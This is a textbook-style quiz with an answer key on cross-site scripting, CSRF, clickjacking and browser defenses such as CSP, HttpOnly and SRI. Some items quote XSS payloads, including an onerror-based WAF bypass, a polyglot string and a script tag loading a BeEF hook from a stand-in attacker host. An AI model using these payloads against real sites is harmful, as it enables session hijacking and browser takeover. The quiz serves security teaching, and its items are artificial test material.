Chapter 20 Quiz: Cross-Site Scripting and Client-Side Attacks

Question 1

What is the fundamental difference between reflected XSS and stored XSS?

A) Reflected XSS uses JavaScript; stored XSS uses HTML B) Reflected XSS requires the victim to click a crafted link; stored XSS affects every user who views the compromised content C) Reflected XSS targets the server; stored XSS targets the client D) Reflected XSS is more dangerous than stored XSS

Answer: B) Reflected XSS payloads exist only in the crafted URL/request and require user interaction. Stored XSS payloads are saved in the application (database, file) and execute for every user who views the affected content, making stored XSS generally more dangerous.

Question 2

Which browser security mechanism does XSS bypass?

A) HTTPS encryption B) The Same-Origin Policy C) Certificate pinning D) HTTP Strict Transport Security

Answer: B) The Same-Origin Policy prevents scripts from one origin from accessing data from another origin. XSS injects code that runs in the context of the trusted origin, making it same-origin with the target application and bypassing SOP restrictions.

Question 3

What is DOM-based XSS, and how does it differ from reflected and stored XSS?

A) DOM XSS uses different HTML tags than other XSS types B) DOM XSS exists entirely in client-side JavaScript; the server never sees the payload C) DOM XSS only works in Internet Explorer D) DOM XSS requires access to the database

Answer: B) In DOM-based XSS, the vulnerability is in client-side JavaScript that reads user-controlled data (e.g., location.hash) and writes it to the DOM unsafely (e.g., innerHTML). The payload never reaches the server, making it invisible to server-side security controls.

Question 4

Which cookie attribute is the primary defense against cookie theft via XSS?

A) Secure B) SameSite=Strict C) HttpOnly D) Path=/

Answer: C) The HttpOnly flag prevents JavaScript from accessing the cookie via document.cookie. Even if an XSS payload executes, it cannot read HttpOnly cookies. This is the most important defense against session hijacking via XSS.

Question 5

A CSP header includes script-src 'self' 'unsafe-inline'. How does this affect XSS defense?

A) It completely prevents XSS B) It only allows scripts from the same origin C) It allows inline scripts to execute, effectively negating CSP's XSS protection D) It blocks all JavaScript execution

Answer: C) The 'unsafe-inline' keyword allows any inline script (including attacker-injected <script> tags and event handlers) to execute. This makes the CSP essentially useless against XSS, which is why modern CSP configurations should use nonces or hashes instead.

Question 6

What is CSRF (Cross-Site Request Forgery)?

A) An attack where the attacker modifies the server's code B) An attack where the attacker tricks the victim's browser into making authenticated requests to a target application C) An attack where the attacker intercepts network traffic D) An attack where the attacker creates a fake website

Answer: B) CSRF exploits the browser's automatic inclusion of credentials (cookies) with requests. When a victim visits an attacker-controlled page, it can make requests to the target application that include the victim's session cookie, causing the server to process them as legitimate.

Question 7

What is the modern primary defense against CSRF?

A) Input validation B) HTTPS encryption C) SameSite cookie attribute D) Content Security Policy

Answer: C) The SameSite cookie attribute (Strict or Lax) prevents the browser from sending the cookie on cross-origin requests, blocking CSRF at the browser level. This is supplemented by CSRF tokens and custom header requirements for defense in depth.

Question 8

In a clickjacking attack, what HTML element is used to load the target website invisibly?

A) <div> B) <iframe> C) <script> D) <canvas>

Answer: B) Clickjacking uses a transparent <iframe> to load the target website, positioned so that the victim's clicks on the visible decoy page actually interact with the hidden iframe content.

Question 9

Which CSP directive prevents clickjacking?

A) script-src 'self' B) frame-ancestors 'none' C) default-src 'self' D) form-action 'self'

Answer: B) The frame-ancestors directive controls which origins can frame the page. Setting it to 'none' prevents the page from being loaded in any iframe, blocking clickjacking. This supersedes the older X-Frame-Options header.

Question 10

What is the Samy worm known for?

A) The first SQL injection worm B) The fastest-spreading virus ever, using stored XSS on MySpace to propagate C) A worm that encrypted hard drives D) The first mobile phone worm

Answer: B) The Samy worm (2005) exploited stored XSS in MySpace profile pages. It added the creator as a friend, copied itself to the victim's profile, and propagated to anyone who viewed that profile. It infected over one million profiles in under 20 hours.

Question 11

What is a "sink" in the context of DOM-based XSS?

A) A place where data enters the application B) A JavaScript function that writes data to the DOM in a potentially dangerous way C) A type of HTTP request D) A database table that stores user input

Answer: B) A "sink" is a dangerous JavaScript function or property that can render user-controlled data as HTML or execute it as code. Examples include innerHTML, document.write(), eval(), and element.src. A "source" is where user-controlled data enters (e.g., location.hash).

Question 12

Which XSS payload type works across multiple reflection contexts simultaneously?

A) A polyglot payload B) A reflected payload C) A DOM payload D) A mutation payload

Answer: A) An XSS polyglot is designed to work across multiple contexts (HTML body, quoted attributes, JavaScript strings) simultaneously. For example, '"><img src=x onerror=alert(1)>// can break out of quotes, close tags, and inject an event handler.

Question 13

What is mutation XSS (mXSS)?

A) XSS that mutates to avoid detection B) XSS that exploits differences in how browsers parse HTML during different operations C) XSS that changes the server's source code D) XSS that targets genetic databases

Answer: B) Mutation XSS exploits the fact that browsers may parse the same string differently when it is processed through different operations (e.g., initial parsing vs. innerHTML assignment). A string that appears safe after initial parsing may become dangerous when re-parsed.

Question 14

An attacker injects <script src="https://attacker.com/hook.js"></script> via stored XSS. What is hook.js likely?

A) A Bitcoin mining script B) A BeEF (Browser Exploitation Framework) hook for persistent browser control C) A keylogger only D) A DDoS script

Answer: B) Loading an external script via XSS, particularly from a tool like BeEF, provides the attacker with persistent, interactive control over the victim's browser. BeEF can perform reconnaissance, social engineering, keylogging, and network scanning through the hooked browser.

Question 15

Which of the following is NOT a valid defense against XSS?

A) Context-aware output encoding B) Content Security Policy with nonce-based script-src C) Setting cookies as HttpOnly D) Using HTTP instead of HTTPS

Answer: D) Using HTTP instead of HTTPS provides no XSS defense and actually makes the application less secure (no transport encryption). All other options are valid XSS defenses: output encoding prevents injection, CSP prevents execution, and HttpOnly prevents cookie theft.

Question 16

A penetration tester discovers that a search field reflects input in the HTML body without encoding, but the application has a WAF that blocks <script> tags. Which payload is most likely to bypass the WAF?

A) <SCRIPT>alert(1)</SCRIPT> B) <img src=x onerror=alert(1)> C) <script type="text/javascript">alert(1)</script> D) <script>alert(1)</script>

Answer: B) The <img> tag with an onerror event handler does not use the word "script" at all, bypassing WAF rules that specifically block <script> tags. Event handlers are the most common WAF bypass technique because there are dozens of valid event handler attributes.

Question 17

In a CSRF attack, why does the attacker include <input type="hidden" name="csrf_token" value="fake-value"> in the forged form?

A) To make the form look legitimate B) Because the server might not check if the token is present, only if it has a value C) To test if the CSRF token is validated by the server D) To encrypt the form data

Answer: C) The attacker includes a fake CSRF token to test whether the server validates the token. If the server only checks for the presence of the parameter (not its value), the fake token will be accepted. A properly implemented CSRF defense validates that the token matches the session's expected value.

Question 18

What is Subresource Integrity (SRI) and what attack does it prevent?

A) SRI encrypts subresources; it prevents data theft B) SRI validates that externally loaded scripts have not been tampered with; it prevents supply-chain attacks via compromised CDNs C) SRI limits which subdomains can load resources; it prevents XSS D) SRI checks server identity; it prevents MITM attacks

Answer: B) SRI allows the browser to verify that files fetched from CDNs or external sources have not been modified. The integrity attribute contains a cryptographic hash of the expected content. If the file has been tampered with (e.g., compromised CDN), the browser refuses to execute it.